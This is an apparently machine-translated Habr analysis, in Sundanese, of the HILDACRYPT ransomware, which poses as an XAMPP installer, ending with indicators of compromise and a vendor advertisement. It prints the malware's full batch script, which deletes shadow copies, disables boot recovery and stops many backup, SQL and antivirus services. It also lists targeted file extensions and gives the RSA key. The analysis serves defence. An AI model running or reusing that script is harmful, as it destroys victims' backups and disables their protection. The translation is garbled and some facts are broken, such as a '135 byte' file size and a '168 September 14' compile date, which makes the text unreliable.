Halo, Habr! Sakali deui, urang ngobrol ngeunaan versi malware panganyarna tina kategori Ransomware. HILDACRYPT mangrupikeun ransomware énggal, anggota kulawarga Hilda anu kapanggih dina Agustus 2019, dingaranan kartun Netflix anu dianggo pikeun nyebarkeun parangkat lunak. Dinten ayeuna urang kenal sareng fitur téknis tina virus ransomware anu diropéa ieu.
Dina versi munggaran Hilda ransomware, link ka hiji dipasang dina Youtube serial kartun ieu dikandung dina surat tebusan. HILDACRYPT nyamar salaku pamasang XAMPP anu sah, distribusi Apache anu gampang dipasang anu kalebet MariaDB, PHP, sareng Perl. Dina waktos anu sami, cryptolocker gaduh nami file anu béda - xamp. Salaku tambahan, file ransomware henteu gaduh tanda tangan éléktronik.
Analisis statik
Ransomware aya dina file PE32 .NET anu ditulis pikeun MS Windows. Ukuranna 135 bait. Boh kode program utama sareng kode program bek ditulis dina C #. Numutkeun tanggal kompilasi sareng cap waktos, binér diciptakeun dina 168 Séptémber 14.
Numutkeun kana Detect It Easy, ransomware diarsipkeun nganggo Confuser sareng ConfuserEx, tapi obfuscators ieu sami sareng sateuacanna, ngan ConfuserEx anu panerusna Confuser, janten tanda tangan kodena sami.
HILDACRYPT memang rangkep sareng ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor serangan
Paling dipikaresep, ransomware kapanggih dina salah sahiji situs programming web, masquerading salaku program XAMPP sah.
Sakabéh ranté inféksi bisa ditempo dina .
Kabingung
Senar ransomware disimpen dina bentuk énkripsi. Nalika diluncurkeun, HILDACRYPT ngadekrip aranjeunna nganggo Base64 sareng AES-256-CBC.
setting
Anu mimiti, ransomware nyiptakeun polder dina %AppDataRoaming% dimana parameter GUID (Global Unique Identifier) sacara acak. Ku nambihan file bat ka lokasi ieu, virus ransomware ngaluncurkeunana nganggo cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & kaluar
Teras ngamimitian ngalaksanakeun skrip angkatan pikeun nganonaktipkeun fitur atanapi jasa sistem.
Skrip ngandung daptar panjang paréntah anu ngancurkeun salinan kalangkang, nganonaktipkeun server SQL, cadangan sareng solusi antipirus.
Salaku conto, éta gagal pikeun ngeureunkeun jasa Acronis Backup. Salaku tambahan, éta nyerang sistem cadangan sareng solusi antipirus ti padagang di handap ieu: Veeam, Sophos, Kaspersky, McAfee sareng anu sanésna.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Sakali jasa sareng prosés anu disebatkeun di luhur ditumpurkeun, cryptolocker ngumpulkeun inpormasi ngeunaan sadaya prosés anu ngajalankeun nganggo paréntah daptar tugas pikeun mastikeun yén sadaya jasa anu diperyogikeun turun.
daptar tugas v/fo csv
Paréntah ieu nunjukkeun daptar lengkep ngeunaan prosés anu ngajalankeun, unsur-unsurna dipisahkeun ku tanda ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Saatos pamariksaan ieu, ransomware ngamimitian prosés énkripsi.
Énkripsi
Énkripsi file
HILDACRYPT ngalangkungan sadaya eusi hard drive anu kapanggih, iwal ti folder Recycle.Bin sareng Reference AssembliesMicrosoft. Anu terakhir ngandung file dll kritis, pdb, jsb pikeun aplikasi .Net anu tiasa mangaruhan operasi ransomware. Pikeun milarian file anu bakal énkripsi, daptar ekstensi ieu dianggo:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware ngagunakeun algoritma AES-256-CBC pikeun énkripsi file pangguna. Ukuran konci nyaéta 256 bit sareng ukuran vektor initialization (IV) nyaéta 16 bait.
Dina screenshot ieu, nilai byte_2 sareng byte_1 dicandak sacara acak nganggo GetBytes ().
konci
DINA JEUNG
File énkripsi gaduh ekstensi HCY!.. Ieu conto file énkripsi. Konci sareng IV anu disebatkeun di luhur diciptakeun pikeun file ieu.
Énkripsi konci
Cryptolocker nyimpen konci AES anu dihasilkeun dina file énkripsi. Bagian kahiji tina file énkripsi gaduh lulugu anu ngandung data sapertos HILDACRYPT, KEY, IV, FileLen dina format XML, sareng sapertos kieu:
Enkripsi konci AES sareng IV dilakukeun nganggo RSA-2048, sareng encoding dilakukeun nganggo Base64. Konci publik RSA disimpen dina awak cryptolocker dina salah sahiji senar énkripsi dina format XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Konci publik RSA dipaké pikeun énkripsi konci file AES. Konci publik RSA dikodekeun Base64 sarta diwangun ku modulus jeung eksponen publik 65537. Dekripsi merlukeun konci swasta RSA, nu narajang boga.
Saatos énkripsi RSA, konci AES disandi nganggo Base64 anu disimpen dina file énkripsi.
Pesen tebusan
Saatos énkripsi réngsé, HILDACRYPT nyerat file html kana polder dimana éta énkripsi file. Bewara ransomware ngandung dua alamat email dimana korban tiasa ngahubungi panyerang.
Bewara extortion ogé ngandung garis "Teu aya loli anu aman;)" - rujukan pikeun karakter anime sareng manga kalayan penampilan budak awéwé leutik dilarang di Jepang.
kacindekan
HILDACRYPT, kulawarga ransomware anyar, parantos ngaluarkeun vérsi énggal. Modél énkripsi nyegah korban tina ngadekrip file anu énkripsi ku ransomware. Cryptolocker nganggo metode panyalindungan aktip pikeun nganonaktipkeun jasa perlindungan anu aya hubunganana sareng sistem cadangan sareng solusi antipirus. Panulis HILDACRYPT mangrupikeun kipas tina séri animasi Hilda anu dipidangkeun dina Netflix, tautan kana trailer anu dikandung dina surat pameseran pikeun versi program sateuacana.
Sakumaha biasa, и tiasa ngajaga komputer anjeun tina ransomware HILDACRYPT, sareng panyadia gaduh kamampuan pikeun ngajagi para nasabahna . Perlindungan dipastikeun ku kanyataan yén solusi ieu kalebet ngawengku teu ngan cadangan, tapi ogé sistem kaamanan terpadu urang - Powered by model learning machine and based on behavioral heuristics, a technology that is able to countering the zero-day ransomware like no other.
Indikator tina kompromi
Ekstensi file HCY!
HILDACRYPTReadMe.html
xamp.exe sareng hiji hurup "p" sareng henteu aya tanda tangan digital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
sumber: www.habr.com